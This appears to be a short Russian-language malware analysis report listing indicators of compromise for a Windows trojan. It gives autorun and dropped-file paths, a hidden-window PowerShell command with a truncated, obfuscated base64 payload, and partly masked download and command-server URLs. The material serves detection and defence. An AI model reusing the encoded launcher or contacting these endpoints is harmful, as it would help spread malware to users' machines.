Техническая информация
- 'uxsms' "<SYSTEM32>\java\uxsms.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- <SYSTEM32>\java\uxsms.exe
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe в <SYSTEM32>\java\uxsms.exe
- '50.##1.220.50':80
- http://fo#######nsathletefactory.com/wp-admin/i/
- http://50.##1.220.50/FxLzFNHCtZ9BW/ozbyNTFcvldhiV79BlF/iBiG/9jV7B7j2TMB39GjbqP/5VvdmR38K/AaNB/
- DNS ASK fo#######nsathletefactory.com
- '%HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe'
- '<SYSTEM32>\java\uxsms.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...' (со скрытым окном)